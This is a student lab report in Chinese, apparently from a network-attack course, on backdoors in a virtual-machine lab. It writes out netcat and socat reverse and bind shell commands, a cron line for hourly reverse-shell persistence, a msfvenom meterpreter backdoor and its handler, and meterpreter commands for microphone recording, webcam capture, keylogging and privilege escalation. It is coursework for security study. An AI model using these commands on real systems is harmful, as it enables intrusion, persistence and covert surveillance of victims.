2018-2019-2 网络对抗技术 20165231 Exp2 后门原理与实践

<div v class="preview html_preview xsj_public"><div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce58685e5aeb9_1" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce58685e5aeb9_1" class="blank_anchor_id" target="_blank"></a><a name="实验内容" class="blank_anchor_name" target="_blank"></a><a id="实验内容" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">实验内容</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">1.使用netcat获取主机操做Shell,cron启动<br> 2.使用socat获取主机操做Shell, 任务计划启动<br> 3.使用MSF meterpreter(或其余软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell<br> 4.使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权<br> 5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹链接Shell</p> <div class="xiaoshujiang_element xsj_anchor"> <a name="e59fbae7a180e997aee7ad94_2" class="blank_anchor_name" target="_blank"></a><a id="e59fbae7a180e997aee7ad94_2" class="blank_anchor_id" target="_blank"></a><a name="基础问答" class="blank_anchor_name" target="_blank"></a><a id="基础问答" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">基础问答</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">(1)例举你能想到的一个后门进入到你系统中的可能方式?</p> <ul> <li>网站捆绑下载</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">(2)例举你知道的后门如何启动起来(win及linux)的方式?</p> <ul> <li>修改注册表,添加自启动、修改正常软件快捷方式的启动路径</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">(3)Meterpreter有哪些给你映像深入的功能?</p> <ul> <li>夺取开启摄像头、麦克风等设备权限,读取键盘内容</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">(4)如何发现本身有系统有没有被安装后门?</p> <ul> <li>电脑安全软件扫描、查看自启项有无异常程序</li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce8bf87e7a88b_3" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce8bf87e7a88b_3" class="blank_anchor_id" target="_blank"></a><a name="实验过程" class="blank_anchor_name" target="_blank"></a><a id="实验过程" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">实验过程</span></h2> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5b8b8e794a8e5908ee997a8e5b7a5e585b7e6b58be8af95_4" class="blank_anchor_name" target="_blank"></a><a id="e5b8b8e794a8e5908ee997a8e5b7a5e585b7e6b58be8af95_4" class="blank_anchor_id" target="_blank"></a><a name="经常使用后门工具测试" class="blank_anchor_name" target="_blank"></a><a id="经常使用后门工具测试" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">经常使用后门工具测试</span></h3> <div class="xiaoshujiang_element xsj_anchor"> <a name="ncat_5" class="blank_anchor_name" target="_blank"></a><a id="ncat_5" class="blank_anchor_id" target="_blank"></a><a name="ncat" class="blank_anchor_name" target="_blank"></a><a id="ncat" class="blank_anchor_id" target="_blank"></a> </div> <h4 class="xsj_heading_hash xsj_heading xsj_heading_h4"><span class="xsj_heading_content">ncat</span></h4> <div class="xiaoshujiang_element xsj_anchor"> <a name="linuxe88eb7e5be97windows20shell_6" class="blank_anchor_name" target="_blank"></a><a id="linuxe88eb7e5be97windows20shell_6" class="blank_anchor_id" target="_blank"></a><a name="linux得到windows-shell" class="blank_anchor_name" target="_blank"></a><a id="linux得到windows-shell" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">Linux得到Windows Shell</span></h5> <ul> <li>首先在查看kali虚拟机的IP地址<code>ifconfig</code>(这里和win的<code>ipconfig</code>有所区别)<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111052529-1483369243.png" alt=" " title=" " name="images/kali_ip.png" data-src="./images/kali_ip.png"></span></li> <li>kali使用nc指令监听端口:<code>nc -l -p 5231</code></li> <li>Windows上使用ncat.exe程序的-e选项项反向链接Kali主机的端口:ncat.exe -e cmd.exe 192.168.70.131 5231</li> <li>kali:得到win7 Windows Shell<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111053548-203636824.png" alt=" " title=" " name="images/kali控win-1.png" data-src="./images/kali%E6%8E%A7win-1.png"></span></li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="windowse88eb7e5be97linux20shell_7" class="blank_anchor_name" target="_blank"></a><a id="windowse88eb7e5be97linux20shell_7" class="blank_anchor_id" target="_blank"></a><a name="windows得到linux-shell" class="blank_anchor_name" target="_blank"></a><a id="windows得到linux-shell" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">Windows得到Linux Shell</span></h5> <ul> <li>Windows:使用ipconfig指令查看本机IP:192.168.70.130<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111054969-114833963.png" alt=" " title=" " name="images/win_ip.png" data-src="./images/win_ip.png"></span></li> <li>使用ncat.exe程序监听本机的端口:<code>ncat.exe -l -p 5231</code></li> <li>kali:使用nc指令的-e选项反向链接Windows主机的端口:<code>ncat 192.168.70.130 5231 -e /bin/sh</code></li> <li>Windows获取kali shell<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111055355-1330331357.png" alt=" " title=" " name="images/win控kali-1.png" data-src="./images/win%E6%8E%A7kali-1.png"></span></li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="e794a8nce4bca0e8be93e695b0e68dae_8" class="blank_anchor_name" target="_blank"></a><a id="e794a8nce4bca0e8be93e695b0e68dae_8" class="blank_anchor_id" target="_blank"></a><a name="用nc传输数据" class="blank_anchor_name" target="_blank"></a><a id="用nc传输数据" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">用nc传输数据</span></h5> <ul> <li>在Windows下监听端口:<code>ncat.exe -l 5231</code></li> <li>kali下链接到Windows的端口:<code>nc 192.168.70.130 5231</code><br> 以后就能够双向传输文字</li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="e794a8nce4bca0e8be93e69687e4bbb6_9" class="blank_anchor_name" target="_blank"></a><a id="e794a8nce4bca0e8be93e69687e4bbb6_9" class="blank_anchor_id" target="_blank"></a><a name="用nc传输文件" class="blank_anchor_name" target="_blank"></a><a id="用nc传输文件" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">用nc传输文件</span></h5> <ul> <li>Windows下监听端口,把收到的数据保存到wyhy.out中:<code>ncat.exe -l 5231 &gt; wyhy.out</code></li> <li>kali下先建立wyhy.in文件,再反弹链接到Windows的端口:<code>nc 192.168.70.130 5231 &lt; wyhy.in</code><br> 传输成功后kali里建立的文件的内容就会在Windows同名文件中出现。<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111055583-1004352803.png" alt="" title="" name="images/传文件kali_1.png" data-src="./images/%E4%BC%A0%E6%96%87%E4%BB%B6kali_1.png"></span><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111056043-1201411368.png" alt=" " title=" " name="images/传文件win_1.png" data-src="./images/%E4%BC%A0%E6%96%87%E4%BB%B6win_1.png"></span></li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="1e38081e4bdbfe794a8netcate88eb7e58f96e4b8bbe69cbae6938de4bd9cshellefbc8ccrone590afe58aa8_10" class="blank_anchor_name" target="_blank"></a><a id="1e38081e4bdbfe794a8netcate88eb7e58f96e4b8bbe69cbae6938de4bd9cshellefbc8ccrone590afe58aa8_10" class="blank_anchor_id" target="_blank"></a><a name="1-使用netcat获取主机操做shellcron启动" class="blank_anchor_name" target="_blank"></a><a id="1-使用netcat获取主机操做shellcron启动" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">一、使用netcat获取主机操做Shell,cron启动</span></h3> <p class="xsj_paragraph xsj_paragraph_level_0">先在win7系统下,监听端口:<code>ncat.exe -l -p 5231</code><br> 在kali下,使用<code>man cron</code>查看crontab命令的帮助文档<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111056421-1799704177.png" alt=" " title=" " name="images/man_cron.png" data-src="./images/man_cron.png"></span><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111057541-515069567.png" alt=" " title=" " name="images/翻译.png" data-src="./images/%E7%BF%BB%E8%AF%91.png"></span></p> <ul> <li>crontab指令能够用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供以后读取和执行。</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">用<code>crontab -e</code>指令编辑一条定时任务<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111058357-158091209.png" alt=" " title=" " name="images/定时.png" data-src="./images/%E5%AE%9A%E6%97%B6.png"></span><br> 在最后一行添加<code>18 * * * * /bin/netcat 192.168.70.131 -e /bin/sh</code>,意思是在每一个小时的第18分钟反向链接Windows主机的端口</p> <p class="xsj_paragraph xsj_paragraph_level_0">在时间没到的时候不管你在Windows那边怎么输都是没有反应的,可是在时间到的一刻你输入的全部都会瞬间显示在频幕上</p> <p class="xsj_paragraph xsj_paragraph_level_0"></p><div class="story_image_container story_block_image"><div class="story_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111058888-605079851.png" alt=" " title=" " name="images/1结果.png" data-src="./images/1%E7%BB%93%E6%9E%9C.png"><br><div class="story_image_caption story_image_blank_caption"> </div></div></div><p></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="2e38081e4bdbfe794a8socate88eb7e58f96e4b8bbe69cbae6938de4bd9cshell20e4bbbbe58aa1e8aea1e58892e590afe58aa8_11" class="blank_anchor_name" target="_blank"></a><a id="2e38081e4bdbfe794a8socate88eb7e58f96e4b8bbe69cbae6938de4bd9cshell20e4bbbbe58aa1e8aea1e58892e590afe58aa8_11" class="blank_anchor_id" target="_blank"></a><a name="2-使用socat获取主机操做shell-任务计划启动" class="blank_anchor_name" target="_blank"></a><a id="2-使用socat获取主机操做shell-任务计划启动" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">二、使用socat获取主机操做Shell, 任务计划启动</span></h3> <ul> <li>在Windows系统下,打开<code>控制面板&gt;系统和安全&gt;管理工具&gt;任务计划程序&gt;建立任务</code>在触发器选项开始任务选项选择<code>工做站锁定时</code><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111100099-568237632.png" alt=" " title=" " name="images/建立触发器.png" data-src="./images/%E5%88%9B%E5%BB%BA%E8%A7%A6%E5%8F%91%E5%99%A8.png"></span><br> 在操做选项卡填入socat的路径,参数填<code>tcp-listen:XX exec:cmd.exe,pty,stderr</code>(XX为本身设定端口号)</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0"></p><div class="story_image_container story_block_image"><div class="story_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111101537-1372935084.png" alt=" " title=" " name="images/建立操做.png" data-src="./images/%E5%88%9B%E5%BB%BA%E6%93%8D%E4%BD%9C.png"><br><div class="story_image_caption story_image_blank_caption"> </div></div></div><p></p> <p class="xsj_paragraph xsj_paragraph_level_0">建立完成后锁定Windows,而后去kali<br> 在kali输入<code>socat - tcp:windows IP:端口号</code>此时能够发现已经成功得到了一个cmd shell(这里可能须要作两次,Windows初次使用socat会有弹窗提示是否容许使用网络,然而你锁了Windows啥都不知道,不成功就倒回去Windows看看吧)<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111102224-791503318.png" alt=" " title=" " name="images/实验二结果.png" data-src="./images/%E5%AE%9E%E9%AA%8C%E4%BA%8C%E7%BB%93%E6%9E%9C.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="3e38081e4bdbfe794a8msf20meterpretere7949fe68890e58fafe689a7e8a18ce69687e4bbb6efbc8ce588a9e794a8ncate68896socate4bca0e98081e588b0e4b8bbe69cbae5b9b6e8bf90e8a18ce88eb7e58f96e4b8bbe69cbashell_12" class="blank_anchor_name" target="_blank"></a><a id="3e38081e4bdbfe794a8msf20meterpretere7949fe68890e58fafe689a7e8a18ce69687e4bbb6efbc8ce588a9e794a8ncate68896socate4bca0e98081e588b0e4b8bbe69cbae5b9b6e8bf90e8a18ce88eb7e58f96e4b8bbe69cbashell_12" class="blank_anchor_id" target="_blank"></a><a name="3-使用msf-meterpreter生成可执行文件利用ncat或socat传送到主机并运行获取主机shell" class="blank_anchor_name" target="_blank"></a><a id="3-使用msf-meterpreter生成可执行文件利用ncat或socat传送到主机并运行获取主机shell" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell</span></h3> <p class="xsj_paragraph xsj_paragraph_level_0">在kali中输入指令<code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=XXXX -f exe &gt; 20165231_backdoor.exe</code>生成后门<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111104494-1093181105.png" alt=" " title=" " name="images/生成后门.png" data-src="./images/%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8.png"></span></p> <p class="xsj_paragraph xsj_paragraph_level_0">在Windows下执行<code>ncat.exe -l 5231 &gt; 20165231_backdoor.exe</code>,被控主机进入接收文件模式<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111105470-703264936.png" alt=" " title=" " name="images/生成后门_1.png" data-src="./images/%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8_1.png"></span><br> 在kali中经过<code>nc windows ip:XXXX &lt; 20165230_backdoor.exe</code>将生成的后门程序传送到Windows主机上<br> 在kali上使用<code>msfconsole</code>指令进入msf控制台<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111106286-1703040726.png" alt=" " title=" " name="images/监控平台.png" data-src="./images/%E7%9B%91%E6%8E%A7%E5%B9%B3%E5%8F%B0.png"></span></p> <p class="xsj_paragraph xsj_paragraph_level_0">设置监听模块</p> <blockquote> <p class="xsj_paragraph xsj_paragraph_level_1">use exploit/multi/handler //使用监听模块,设置payload<br> set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload<br> set LHOST 192.168.70.131 //这里用的是LinuxIP,和生成后门程序时指定的IP相同<br> set LPORT 5231 //一样要使用相同的端口</p> </blockquote> <p class="xsj_paragraph xsj_paragraph_level_0"></p><div class="story_image_container story_block_image"><div class="story_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111107490-1991133014.png" alt=" " title=" " name="images/监听配置.png" data-src="./images/%E7%9B%91%E5%90%AC%E9%85%8D%E7%BD%AE.png"><br><div class="story_image_caption story_image_blank_caption"> </div></div></div><p></p> <p class="xsj_paragraph xsj_paragraph_level_0">设置完成后,执行监听<code>exploit</code>而后在Windows上双击以前生成的文件<br> 此时kali上已经得到了Windows主机的链接,而且获得了远程控制的shell<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111108548-172311526.png" alt=" " title=" " name="images/监听成功.png" data-src="./images/%E7%9B%91%E5%90%AC%E6%88%90%E5%8A%9F.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="4e38081e4bdbfe794a8msf20meterpretere7949fe68890e88eb7e58f96e79baee6a087e4b8bbe69cbae99fb3e9a291e38081e69184e5838fe5a4b4e38081e587bbe994aee8aeb0e5bd95e7ad89e58685e5aeb9efbc8ce5b9b6e5b09de8af95e68f90e69d83_13" class="blank_anchor_name" target="_blank"></a><a id="4e38081e4bdbfe794a8msf20meterpretere7949fe68890e88eb7e58f96e79baee6a087e4b8bbe69cbae99fb3e9a291e38081e69184e5838fe5a4b4e38081e587bbe994aee8aeb0e5bd95e7ad89e58685e5aeb9efbc8ce5b9b6e5b09de8af95e68f90e69d83_13" class="blank_anchor_id" target="_blank"></a><a name="4-使用msf-meterpreter生成获取目标主机音频-摄像头-击键记录等内容并尝试提权" class="blank_anchor_name" target="_blank"></a><a id="4-使用msf-meterpreter生成获取目标主机音频-摄像头-击键记录等内容并尝试提权" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权</span></h3> <p class="xsj_paragraph xsj_paragraph_level_0">使用<code>record_mic</code>指令截获一段音频<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111109137-1112246340.png" alt=" " title=" " name="images/luyin.png" data-src="./images/luyin.png"></span><br> 使用<code>webcam_snap</code>指令可使用摄像头进行拍照:<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111110859-1323319754.png" alt=" " title=" " name="images/拍照.png" data-src="./images/%E6%8B%8D%E7%85%A7.png"></span><br> 使用<code>webcam stream</code>指令可使用摄像头进行录像:<br> 使用<code>screenshot</code>指令能够进行截屏:</p> <p class="xsj_paragraph xsj_paragraph_level_0">使用<code>keyscan_start</code>指令开始,在windows中记录下击键的过程,使用<code>keyscan_dump</code>指令读取击键的记录:</p> <p class="xsj_paragraph xsj_paragraph_level_0">先使用<code>getuid</code>指令查看当前用户,使用<code>getsystem</code>指令进行提权,如图所示,提权成功<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111112328-2135864890.png" alt=" " title=" " name="images/监控.png" data-src="./images/%E7%9B%91%E6%8E%A7.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce98187e588b0e79a84e997aee9a298_14" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce98187e588b0e79a84e997aee9a298_14" class="blank_anchor_id" target="_blank"></a><a name="实验遇到的问题" class="blank_anchor_name" target="_blank"></a><a id="实验遇到的问题" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">实验遇到的问题</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">一、使用MSF meterpreter调用摄像头时显示操做失败:1411<br> 解决:虚拟机关联到物理机的摄像头,在VM虚拟机右下加有个U盘标志,右键链接就关联上物理机上的设备了。若是右下角没有U盘标志,那就在虚拟机设置里面添加就ok了。<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111112793-2134769297.png" alt=" " title=" " name="images/TIM截图20190322235442.png" data-src="./images/TIM%E6%88%AA%E5%9B%BE20190322235442.png"></span><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111113225-1869525041.png" alt=" " title=" " name="images/usb.png" data-src="./images/usb.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce6849fe683b3_15" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce6849fe683b3_15" class="blank_anchor_id" target="_blank"></a><a name="实验感想" class="blank_anchor_name" target="_blank"></a><a id="实验感想" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">实验感想</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">我之前一直觉得只要防火墙,安全软件安好就必定不会有什么被入侵的可能。看来我仍是太年轻了,咱们这种初学的小米渣在win7没关防火墙状况下都能依葫芦画瓢完成渗透,若不是摄像头启动有指示灯,神不知鬼不觉都被拍了。不过对于目前的渣渣技术想要彻底渗透到别人的系统里除了这些技术看来还得用上社会工程学才能得手啊。</p> </div>html

相关文章
相关标签/搜索